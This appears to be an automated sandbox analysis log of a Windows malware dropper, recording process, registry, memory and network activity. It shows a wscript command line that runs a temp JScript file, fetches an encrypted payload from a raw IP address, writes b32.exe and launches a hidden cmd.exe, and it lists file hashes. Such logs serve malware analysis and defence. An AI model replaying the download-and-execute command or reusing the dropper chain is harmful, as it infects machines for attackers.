Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Windows\system32\wscript.exe, os_pid = 0xa84, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Thread Resume process_name = c:\windows\syswow64\cmd.exe, os_tid = 0xa70 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE False 2
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Process #4: wscript.exe
338 6
Information Value
ID #4
File Name c:\windows\syswow64\wscript.exe
Command Line wscript //B //E:JScript u32.tmp "LZytas3d" "http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:00:35, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:01:49
OS Process Information
Information Value
PID 0xa84
Parent PID 0xa6c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A88
0x A90
0x A94
0x A98
0x A9C
0x AA0
0x AA4
0x AA8
0x AB0
0x AB4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
wscript.exe 0x00080000 0x0008efff Memory Mapped File Readable True False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d0fff Pagefile Backed Memory Readable True False False -
wscript.exe 0x000e0000 0x00105fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000110000 0x00110000 0x00110fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable True False False -
private_0x0000000000120000 0x00120000 0x0012ffff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x001effff Private Memory Readable, Writable True False False -
locale.nls 0x001f0000 0x00256fff Memory Mapped File Readable False False False -
rsaenh.dll 0x00260000 0x0029bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory Readable True False False -
scrrun.dll 0x00260000 0x00274fff Memory Mapped File Readable False False False -
tzres.dll 0x00280000 0x00280fff Memory Mapped File Readable False False False -
private_0x0000000000280000 0x00280000 0x00280fff Private Memory Readable, Writable True False False -
c_28591.nls 0x00280000 0x00290fff Memory Mapped File Readable False False False -
wshom.ocx 0x002a0000 0x002abfff Memory Mapped File Readable True False False -
private_0x00000000002b0000 0x002b0000 0x003affff Private Memory Readable, Writable True False False -
private_0x00000000003b0000 0x003b0000 0x003effff Private Memory Readable, Writable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000410000 0x00410000 0x0050ffff Private Memory Readable, Writable True False False -
private_0x0000000000510000 0x00510000 0x0063ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000510000 0x00510000 0x005eefff Pagefile Backed Memory Readable True False False -
private_0x0000000000600000 0x00600000 0x0063ffff Private Memory Readable, Writable True False False -
private_0x0000000000680000 0x00680000 0x0068ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000690000 0x00690000 0x00817fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000820000 0x00820000 0x009a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000009b0000 0x009b0000 0x01daffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001db0000 0x01db0000 0x020f2fff Pagefile Backed Memory Readable True False False -
private_0x0000000002100000 0x02100000 0x0216ffff Private Memory Readable, Writable True False False -
private_0x0000000002190000 0x02190000 0x021cffff Private Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x0224ffff Private Memory Readable, Writable True False False -
private_0x0000000002250000 0x02250000 0x0228ffff Private Memory Readable, Writable True False False -
private_0x0000000002290000 0x02290000 0x0238ffff Private Memory Readable, Writable True False False -
private_0x0000000002390000 0x02390000 0x023cffff Private Memory Readable, Writable True False False -
private_0x0000000002410000 0x02410000 0x0250ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02510000 0x027defff Memory Mapped File Readable False False False -
private_0x00000000027f0000 0x027f0000 0x0282ffff Private Memory Readable, Writable True False False -
private_0x0000000002850000 0x02850000 0x0294ffff Private Memory Readable, Writable True False False -
private_0x00000000029a0000 0x029a0000 0x029dffff Private Memory Readable, Writable True False False -
private_0x0000000002a00000 0x02a00000 0x02afffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002b00000 0x02b00000 0x02efffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002f00000 0x02f00000 0x02ffffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x02f00000 0x02fbffff Memory Mapped File Readable, Writable False False False -
private_0x0000000002ff0000 0x02ff0000 0x02ffffff Private Memory Readable, Writable True False False -
private_0x0000000003000000 0x03000000 0x030fffff Private Memory Readable, Writable True False False -
private_0x0000000003100000 0x03100000 0x0319efff Private Memory Readable, Writable True False False -
private_0x0000000003180000 0x03180000 0x031bffff Private Memory Readable, Writable True False False -
private_0x00000000031c0000 0x031c0000 0x032bffff Private Memory Readable, Writable True False False -
private_0x00000000032c0000 0x032c0000 0x0335efff Private Memory Readable, Writable True False False -
private_0x0000000003380000 0x03380000 0x0347ffff Private Memory Readable, Writable True False False -
private_0x0000000003480000 0x03480000 0x0361ffff Private Memory Readable, Writable True False False -
private_0x0000000003480000 0x03480000 0x0357ffff Private Memory Readable, Writable True False False -
private_0x00000000035e0000 0x035e0000 0x0361ffff Private Memory Readable, Writable True False False -
private_0x0000000003620000 0x03620000 0x0371ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003720000 0x03720000 0x03b12fff Pagefile Backed Memory Readable True False False -
private_0x0000000003b20000 0x03b20000 0x03ceffff Private Memory Readable, Writable True False False -
private_0x0000000003bf0000 0x03bf0000 0x03c8efff Private Memory Readable, Writable True False False -
private_0x0000000003cb0000 0x03cb0000 0x03ceffff Private Memory Readable, Writable True False False -
private_0x0000000003cf0000 0x03cf0000 0x03eaffff Private Memory Readable, Writable True False False -
private_0x0000000003cf0000 0x03cf0000 0x03deffff Private Memory Readable, Writable True False False -
private_0x0000000003e70000 0x03e70000 0x03eaffff Private Memory Readable, Writable True False False -
private_0x0000000003eb0000 0x03eb0000 0x040affff Private Memory Readable, Writable True False False -
private_0x00000000040b0000 0x040b0000 0x042affff Private Memory Readable, Writable True False False -
private_0x00000000042b0000 0x042b0000 0x046affff Private Memory Readable, Writable True False False -
private_0x00000000046b0000 0x046b0000 0x04eaffff Private Memory Readable, Writable True False False -
private_0x0000000004eb0000 0x04eb0000 0x052affff Private Memory Readable, Writable True False False -
private_0x0000000005540000 0x05540000 0x05d3ffff Private Memory Readable, Writable True False False -
private_0x0000000005d40000 0x05d40000 0x06d0ffff Private Memory Readable, Writable True False False -
private_0x0000000006d30000 0x06d30000 0x06e2ffff Private Memory Readable, Writable True False False -
webio.dll 0x70fa0000 0x70feefff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x70ff0000 0x71047fff Memory Mapped File Readable, Writable, Executable False False False -
mpr.dll 0x71050000 0x71061fff Memory Mapped File Readable, Writable, Executable False False False -
wshom.ocx 0x71070000 0x71090fff Memory Mapped File Readable, Writable, Executable True False False -
msdart.dll 0x710a0000 0x710befff Memory Mapped File Readable, Writable, Executable False False False -
msado15.dll 0x710c0000 0x711b8fff Memory Mapped File Readable, Writable, Executable False False False -
scrrun.dll 0x71260000 0x71289fff Memory Mapped File Readable, Writable, Executable False False False -
credssp.dll 0x72f20000 0x72f27fff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x73000000 0x7305efff Memory Mapped File Readable, Writable, Executable False False False -
pwrshsip.dll 0x74380000 0x74388fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74390000 0x74413fff Memory Mapped File Readable, Writable, Executable False False False -
mlang.dll 0x74790000 0x747bdfff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x74e00000 0x74e04fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74e20000 0x74e5bfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74f60000 0x74f6dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74f70000 0x74faafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74fb0000 0x74fc5fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75000000 0x75008fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x752b0000 0x752c2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
wshext.dll 0x75410000 0x75425fff Memory Mapped File Readable, Writable, Executable True False False -
msisip.dll 0x75430000 0x75437fff Memory Mapped File Readable, Writable, Executable False False False -
jscript.dll 0x75530000 0x755e1fff Memory Mapped File Readable, Writable, Executable True False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75a60000 0x75b7cfff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x75b80000 0x75bacfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x763d0000 0x763dbfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76890000 0x76912fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76920000 0x77569fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 31 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrg~1\appdata\local\temp\b32.exe 316.01 KB MD5: 2a5926e061c5cf3c6f8bb8908464468a
SHA1: d256701b40efd72f2ed9c0ebacdea162926590cd
SHA256: c0db3c329592294a81f23c37e701a189110913c17d1371bc625a3eae97f37a94
False
Threads
Thread 0xa88
336 6
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-05-11 13:20:37 (UTC) True 1
Fn
System Get Time type = Ticks, time = 100027 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\wscript.exe, base_address = 0xe0000 True 2
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 3, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 3, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 3, type = REG_NONE False 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSetInformation, address_out = 0x75fe5651 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\wscript.exe, process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\wscript.exe, size = 261 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 205, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 96, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 205, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 96, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 160, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 160, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x77e9848f True 2
Fn
Module Get Filename process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\wscript.exe, size = 260 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x760f4907 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features False 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExA, address_out = 0x760f48ef True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x760f469d True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x776c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoGetObjectContext, address_out = 0x7770632b True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x776c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x77709d0b True 1
Fn
COM Create interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Environment Get Environment String name = JS_PROFILER False 1
Fn
COM Create interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 100074 True 2
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\u32.tmp, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\u32.tmp, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\5P5NRG~1\AppData\Local\Temp\u32.tmp, filename = C:\Users\5P5NRG~1\AppData\Local\Temp\u32.tmp, protection = PAGE_READONLY, maximum_size = 1141 True 1
Fn
Module Map C:\Users\5P5NRG~1\AppData\Local\Temp\u32.tmp, process_name = c:\windows\syswow64\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\wscript.exe True 1
Fn
System Get Info type = System Directory True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x76102102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x76103352 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SaferCloseLevel, address_out = 0x76103825 True 1
Fn
System Get Info type = Operating System True 1
Fn
COM Get Class ID cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 00000566-0000-0010-8000-00AA006D2EA4, prog_id = ADODB.Stream True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\wscript.exe, size = 261 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\wscript.exe, base_address = 0xe0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wscript.exe, function = 1, address_out = 0xe2bb9 True 1
Fn
COM Get Class ID cls_id = 2087C2F4-2CEF-4953-A8AB-66779B670495, prog_id = WinHTTP.WinHTTPRequest.5.1 True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = 95.142.39.142, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = / True 1
Fn
Inet Send HTTP Request url = http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0 True 1
Fn
Inet Receive HTTP Status status = 200 True 1
Fn
Inet Read Response size_out = 288, data = %&Ó"ÉÚPtBw®îþÃä#1û÷j¶„Ë"¦â¬Â›Ú«>#Wá¤(Jö›(½ O÷ ê¤R±íÎÖ¶?è-ž#z*AɚÊHÙ蚸ù#¥Áuz̕Ûíéß$$!ëÔög“eŠÑêjke ¥\Ô®èã]v*ÂtÎúÃþ×±·ë†»—ñÂæ>oåñüق´ÍS†j!ʅâÃôÜó^vÑ£oŽRdÁ\$ßä‡è o§]F¥èV ¾Ë•ÎBÜjÙtQQf!…Þ¼ý9£|dšüÏ>ú:Ù3ŽæÃpÈɂ/o8cêõ?ªqçã ø-sëP’ååq_¥3cwÂY´FÀό_¹S4`¸ª÷AãÔE¯µ¥jUl True 1
Fn
System Get Time type = Ticks, time = 102617 True 1
Fn
System Get Time type = Ticks, time = 102648 True 3
Fn
System Get Time type = Ticks, time = 102664 True 9
Fn
System Get Time type = Ticks, time = 102679 True 11
Fn
System Get Time type = Ticks, time = 102695 True 10
Fn
System Get Time type = Ticks, time = 102726 True 11
Fn
System Get Time type = Ticks, time = 102742 True 14
Fn
System Get Time type = Ticks, time = 102757 True 13
Fn
System Get Time type = Ticks, time = 102820 True 11
Fn
System Get Time type = Ticks, time = 102835 True 13
Fn
System Get Time type = Ticks, time = 102851 True 12
Fn
System Get Time type = Ticks, time = 102913 True 12
Fn
System Get Time type = Ticks, time = 102929 True 10
Fn
System Get Time type = Ticks, time = 102945 True 9
Fn
System Get Time type = Ticks, time = 102976 True 3
Fn
System Get Time type = Ticks, time = 102991 True 10
Fn
System Get Time type = Ticks, time = 103007 True 8
Fn
System Get Time type = Ticks, time = 103023 True 2
Fn
System Get Time type = Ticks, time = 103038 True 9
Fn
System Get Time type = Ticks, time = 103054 True 10
Fn
System Get Time type = Ticks, time = 103069 True 7
Fn
System Get Time type = Ticks, time = 103085 True 9
Fn
System Get Time type = Ticks, time = 103101 True 9
Fn
System Get Time type = Ticks, time = 103116 True 7
Fn
System Get Time type = Ticks, time = 103132 True 6
Fn
System Get Time type = Ticks, time = 103147 True 4
Fn
System Get Time type = Ticks, time = 103179 True 5
Fn
System Get Time type = Ticks, time = 103194 True 2
Fn
System Get Time type = Ticks, time = 103210 True 4
Fn
System Get Time type = Ticks, time = 103225 True 4
Fn
System Get Time type = Ticks, time = 103257 True 4
Fn
System Get Time type = Ticks, time = 103272 True 6
Fn
System Get Time type = Ticks, time = 103288 True 1
Fn
System Get Time type = Ticks, time = 103865 True 1
Fn
File Create filename = b32.exe True 1
Fn
File Write filename = b32.exe True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76920000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76941e46 True 1
Fn
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = UnregisterTraceGuids, address_out = 0x77e89286 True 2
Fn
Thread 0xa94
2 0
Category Operation Information Success Count Logfile
Window Create class_name = WSH-Timer, wndproc_parameter = 6820864 True 1
Fn
Window Set Attribute class_name = WSH-Timer, index = 18446744073709551595, new_long = 6820864 False 1
Fn
Process #5: cmd.exe
56 0
Information Value
ID #5
File Name c:\windows\syswow64\cmd.exe
